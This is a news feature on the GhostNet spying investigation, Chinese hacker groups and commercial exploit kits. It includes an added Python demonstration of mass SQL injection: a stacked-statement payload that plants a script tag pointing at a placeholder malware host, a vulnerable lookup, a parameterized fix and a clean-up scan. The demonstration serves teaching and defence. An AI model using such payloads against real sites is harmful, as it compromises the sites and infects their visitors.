It wasn’t until Sunday of last week that Scott Henderson knew he’d been duped. The former US army intelligence officer, along with his colleague “Jumper,” had been tracking an alleged Chinese hacker, nicknamed Lost33, who had promised him an interview. “Lost33 did not make contact with Jumper last night. In fact, it seems he spent the night changing his QQ number” — QQ is a popular Chinese instant messaging service — “and deleting all info from his blog. The Web site is now completely empty, except for a change to his personal data,” said Henderson on his blog (bit.ly/darkvisitor).
Henderson had been tracking Lost33 after his e-mail address — losttemp33@hotmail.com — turned up in an investigation called GhostNet (bit.ly/ghostnet2). GhostNet started when Information Warfare Monitor (IWM, bit.ly/infowar), a team of cyberwarfare researchers created by the University of Toronto and the Canadian security think tank SecDev, was asked to conduct a security audit for the Tibetan government in exile. The audit found malicious software on the Dalai Lama’s most sensitive computers.
The investigation traced the malware back to command and control servers located mainly in China. From those servers, the IWM found infected computers in 103 countries. Roughly a third of the infected hosts could be identified, and those turned out to be sensitive computers in organizations of interest to China, including numerous embassies, telecommunications companies and even Vietnamese petroleum firms. Just as Lost33’s identity and motives are shrouded in mystery, the final link between GhostNet and the Chinese government is also missing.
On its face, this looks like a state-sponsored cyber-spying ring, especially when you read the part of the report in which a member of an online Tibetan outreach project was detained for two months and interrogated by Chinese officials, who presented her with copies of her Internet chat logs. The project’s machines had been compromised by the same malware that filched the Dalai Lama’s files, and communicated with the GhostNet control servers.
But there could be other motives and actors, says the IWM. GhostNet could be a for-profit initiative operated by cyber-criminals. It could be operated from outside China, using compromised Chinese computers as proxies (one of the control servers, also the first to be shut down when GhostNet was discovered, was based in the US).
“Even ‘patriotic hackers’ could be acting on their own volition, or with the tacit approval of their government, as operators of the GhostNet,” says the IWM report. The problem is that all of these things are happening in China anyway. Henderson says that patriotic hacking has been a mainstay of the Chinese hacking underground since the mid-1990s.
After the Internet arrived in China in 1994, people began experimenting with the technology, and in 1997 the Green Army hacker group was formed. It gave way to the Red Hacker Alliance, a loosely connected set of groups that emerged after the Jakarta riots of 1998, when Chinese nationals were accused of destabilizing the country. Indonesian Web sites were defaced by outraged Chinese hackers, and a nationalistic movement gathered force.
Since then, profit motives have emerged. “The history has changed from being a group wanting to protect the motherland, to being specialized hacker groups that are there for the purpose of making money,” Henderson says. Hackers have, for example, broken the rule of thumb that kept them from attacking Chinese IP addresses. Hitting compatriots would not have been acceptable when cyber-attacks were motivated by nationalism; in the age of commercialized cybercrime, anyone is fair game.
Zhao Wei (趙薇), co-founder of the Chinese Anti-Malware Alliance (中國反惡意軟件聯盟), has been battling the hacker underground since 2006. He says that hackers in China are growing in number, due in part to the economic downturn, and that Chinese nationals are just as vulnerable to the poor security of Chinese cyberspace as foreign targets.
“At least 20 million people in China lost their jobs, and after they spend all of their money … then they may turn to cybercrime,” says Zhao. He adds that the online crime wave is spreading to the smaller cities that multiplied during the economic boom. Phishing and other cybercrime has supplanted physical crime in some of these places.
After all, why risk harsh punishment for ripping off a warehouse when you can rip off people electronically with scant fear of retribution? “The policemen think it’s cool. There’s no one on the street. They’re all going to the bar, and they’re working on phishing. The policemen love the Internet,” Zhao says.
In addition to phishing and hacking Web sites, Chinese hackers have also exploited flaws in local third-party applications, which are often badly written, Zhao says. China, known for its lax view of intellectual property, is rife with pirated copies of Windows; local companies now provide their own security update services for Microsoft’s software, he says.
So what are Chinese hackers looking for on their victims’ machines? Much the same as hackers elsewhere, but online game accounts are also targeted, and World of Warcraft, the most popular multiplayer online game worldwide, is a particular prize: accumulated gold and character progress from the game can be sold on the open market.
Attacks from Chinese hackers can also be more sophisticated. Dennis Dwyer, a threat intelligence analyst at the Atlanta-based managed security services firm SecureWorks, says that targeted attacks are a signature technique perfected by Chinese cyber-criminals, who conduct extensive research on an organization to learn which individuals work there and how they are related.
“What we have seen is very specific malware. They’ll be looking for people using a certain version of Word,” says Dwyer. The GhostNet report shows how the attackers persuaded victims to open infected files by attaching them to e-mails that appeared to come from people they knew.
“We also see the use of zero-day or file format type exploits [malware applications],” confirms Dwyer. “In particular, we watch a group called Phantom. They’re very public about what they do. What they typically don’t do is use [the exploits] themselves. They sell them for others to use.”
This trend of selling exploits on the open market is now gravitating toward selling toolkits. SecureWorks has identified a new kit, Leopard in a Hole, that automates the kind of SQL injection attacks for which Chinese hackers have become famous. This time last year, Chinese hackers compromised tens of thousands of Web sites by injecting malicious JavaScript into them. Versions of Leopard in a Hole that let non-technical attackers do this with just a few mouse clicks have been found on sale for up to US$500. Online crime is now big business.
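The core trick such a kit automates, shown here as an added example that is not code from the article, from SecureWorks or from Leopard in a Hole itself: a Python/SQLite model of a string-built lookup query of the kind the mass injections abused, the parameterized lookup that defeats the payload, and the clean-up scan a site owner would run over stored content afterwards. The table, its rows and the script host are constructed for the example, and the stacked-statement behaviour of the SQL Server drivers the real attacks relied on is emulated, because sqlite3’s execute() refuses more than one statement.

```python
import re
import sqlite3

# Constructed sample database standing in for a small content-managed site
# of the kind hit by the 2008 mass injections. Table, rows and the script
# host below are made up for this example.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO news (title, body) VALUES ('Welcome', 'First post');
INSERT INTO news (title, body) VALUES ('Update', 'Second post');
"""

# Placeholder host; real kits pointed the tag at a server hosting
# browser exploits.
INJECTED_TAG = '<script src="http://malware.invalid/x.js"></script>'

# Attacker-controlled "article id": a stacked UPDATE that appends the tag
# to every row's body. Mass-injection kits built strings like this for
# the attacker and sprayed them at every parameter of every page crawled.
PAYLOAD = "1; UPDATE news SET body = body || '" + INJECTED_TAG + "'"


def fresh_db():
    """Return an in-memory database populated with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, article_id):
    """Classic ASP-style lookup: the request parameter is spliced into SQL.

    Database stacks such as ADO talking to SQL Server execute every
    statement in the string, so the attacker's UPDATE runs alongside the
    intended SELECT. sqlite3.execute() refuses stacked statements, so the
    stacking is emulated by splitting on ';' and executing each piece.
    """
    sql = "SELECT body FROM news WHERE id = %s" % article_id
    result = None
    for index, statement in enumerate(s for s in sql.split(";") if s.strip()):
        cursor = conn.execute(statement)
        if index == 0:
            row = cursor.fetchone()
            result = row[0] if row else None
    conn.commit()
    return result


def safe_lookup(conn, article_id):
    """Hardened lookup: validate the type, then bind the value as a parameter.

    A bound parameter is never parsed as SQL, so the UPDATE in PAYLOAD could
    only ever be compared against the id column, never executed. The int()
    check rejects the request before it reaches the database at all.
    """
    try:
        article_id = int(article_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT body FROM news WHERE id = ?", (article_id,)).fetchone()
    return row[0] if row else None


# Clean-up check over stored text: an external script tag inside content
# that editors never wrote is the fingerprint of this attack.
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=", re.IGNORECASE)


def find_injected_rows(conn):
    """Return ids of rows whose body carries a script tag with a src attribute."""
    rows = conn.execute("SELECT id, body FROM news ORDER BY id")
    return [row_id for row_id, body in rows if SCRIPT_SRC.search(body or "")]


def demo():
    """Run the payload against both lookups and report what each left behind."""
    attacked = fresh_db()
    vulnerable_lookup(attacked, PAYLOAD)
    hardened = fresh_db()
    safe_lookup(hardened, PAYLOAD)
    return {
        "vulnerable_infected_rows": find_injected_rows(attacked),  # [1, 2]
        "hardened_infected_rows": find_injected_rows(hardened),    # []
    }


if __name__ == "__main__":
    print(demo())
```

Running the block shows every row of the vulnerable site carrying the injected tag after a single request, while the parameterized site is untouched. The scan is the part a site owner needs once the damage is done: the kits rewrote every text column they could reach, so checking only the page that took the request misses most of the injected content.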
In all of this, one unanswered question remains: who was responsible for GhostNet? “It’s convenient to have privateers. People who are given the king’s warrant to act on his behalf, but who are kept at arm’s length,” says Rafal Rohozinski, principal analyst at the IWM and co-author of the report. He likens cyberspace to the high seas of old, populated by what amounted to freelance warships sanctioned by the state. “I think these are third-party actors. Whether they’re deliberately commissioned, protected or allowed to raise money from other activities that are overlooked, I don’t know.”
In China, more than perhaps anywhere else in the world, there is a bountiful supply of such cyber-swashbucklers. Who knows how many other treasure chests people may have buried in the world’s networks — or whether we will ever be able to prove the true identity of those that put them there?